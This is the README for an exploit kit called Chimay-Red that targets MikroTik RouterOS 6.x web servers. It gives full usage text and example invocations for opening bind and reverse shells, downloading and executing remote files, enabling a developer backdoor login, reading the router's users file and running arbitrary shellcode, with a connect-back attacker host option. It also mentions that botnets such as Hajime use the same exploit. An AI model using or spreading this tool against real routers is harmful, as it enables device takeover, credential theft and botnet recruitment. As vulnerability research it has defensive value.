Mikrotik RouterOS (6.x < 6.38.5) exploit kit. Reverse engineered from the "Vault 7" WikiLeaks publication.
To learn more about the creation and purpose of this software, please visit: http://blog.seekintoo.com/chimay-red.html
After further consideration by the Seekintoo team, it has been decided that additional architecture support will NOT be released exploiting any RouterOS supporting architecture either than x86 and mips*.
The reasoning for this, after further research, is that there are currently botnet(s) operating on the internet taking advantage of this exact exploit attacking both x86 and mips* systems, both of which public exploits have been released for. The name of one of these botnets is "hajime". hajime's inception was long ago, but as of late it has been noticed to abuse the chimay-red exploit on RouterOS 6.x devices as covered and analyzed extensively (to name a few):
-
https://avlab.pl/en/exploit-chimay-red-vulnerable-device-mikrotik-and-ubiquiti-form-giant-botnet
-
https://www.corero.com/blog/882-hajime-botnet-scanning-for-vulnerable-mikrotik-routers.html
In-addition to the timing of the release of the first (known) public PoC for Chimay-Red by BigNerd in contrast to the current state of rampant RouterOS harvesting botnets is currently too much to ignore. Therefore Seekintoo will NOT be responsible for contributing to these criminal enterprises.
Although if public exploits for additional architectures are found posted on source code hosting facilities, if robust enough, they WILL be re-supported here.
Feel free to contact me at: dpidhirney@seekintoo dot com
usage: chimay_red.py [-h] -t TARGET [-l LHOST] [--shellcommand SHELLCOMMAND]
[-d] [--breakpoints BREAKPOINTS] [-a ARCHITECTURE]
[--gdbport GDBPORT] [--binary BINARY]
[--shellcode SHELLCODE] [--vector VECTOR]
[--leakrounds LEAKROUNDS] [-v] [--version]
command
positional arguments:
command command function to run on target, see below for
options
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
target address:port
-l LHOST, --lhost LHOST
specify the connectback* address
--shellcommand SHELLCOMMAND
return interactive shell as main payload (default)
-d, --debug enable debugging mode
--breakpoints BREAKPOINTS
list of comma delimited breakpoint addresses. Eg.
0x800400,0x800404
-a ARCHITECTURE, --architecture ARCHITECTURE
target architecture (will detect automatically if
target in route table range)
--gdbport GDBPORT port to use when connecting to remote gdbserver
--binary BINARY target binary (www)
--shellcode SHELLCODE
custom (optional) shellcode payload binary filepath
--vector VECTOR optional vector type, see below for options
--leakrounds LEAKROUNDS
amount of rounds to leak pointers, higher is better,
but takes more time
-v, --verbose Verbosity mode
--version show program's version number and exit
Commands:
COMMAND FUNCTION
bindshell create a bindshell
connectback create a reverse shell
download_and_exe connect back and download a file to then execute
ssl_download_and_exe connect back and download a file via SSL to then execute
write_devel write "devel-login" file to allow developer account login
write_devel_read_userfile in addition to enabling developer logins, read back the users file
custom_shellcode run arbitrary shellcode from `--shellcode` binfile
custom_shell_command run a arbitrary $sh one liner on the target
Vectors:
default: (mikrodb)
[Generic]
mikrodb:
use the accompanying mikrodb database to load offsets
based off of detected remote version to build a ROP chain.
build:
build a ROP chain from scratch given the www binary matching
the remote version running.
[Experimental]
leak:
leak pointers from shared libraries to give better odds of
finding base offset of uclibc.
Examples:
Running simple shell command:
./chimay_red.py -v -t 192.168.56.124:80 \
--vector=mikrodb \
--lhost=192.168.56.1 \
--shellcommand="ls -la" custom_shell_command
Getting a reverse shell:
./chimay_red.py -v -t 192.168.56.124:80 \
--vector=mikrodb \
--lhost=192.168.56.1 connectback
Debugging the target:
./chimay_red.py -v -t 192.168.56.124:80 \
--vector=build \
--architecture="x86" \
--binary=$PWD/storage/www/www-x86-6.38.4.bin \
--debug \
--gdbport=4444 \
--lhost=192.168.56.1 connectback
==================================================
| _______ _ ___ __|
| / ___/ / (_)_ _ ___ ___ ______/ _ \___ ___/ /|
|/ /__/ _ \/ / ' \/ _ `/ // /___/ , _/ -_) _ / |
|\___/_//_/_/_/_/_/\_,_/\_, / /_/|_|\__/\_,_/ |
| /___/ |
==================================================
usage: mikrodb.py [-h] [-v] [--architectures ARCHITECTURES]
[--versions VERSIONS]
optional arguments:
-h, --help show this help message and exit
-v, --verbose Verbosity mode
--architectures ARCHITECTURES
architectures to build for. Eg. --architectures="x86"
or "x86,mmips"
--versions VERSIONS versions to build for. Eg. --versions="6.38.4" or
"6.36.4,6.38.4"
Example:
./mikrodb.py --architectures="x86" --versions="6.36.4,6.38.4"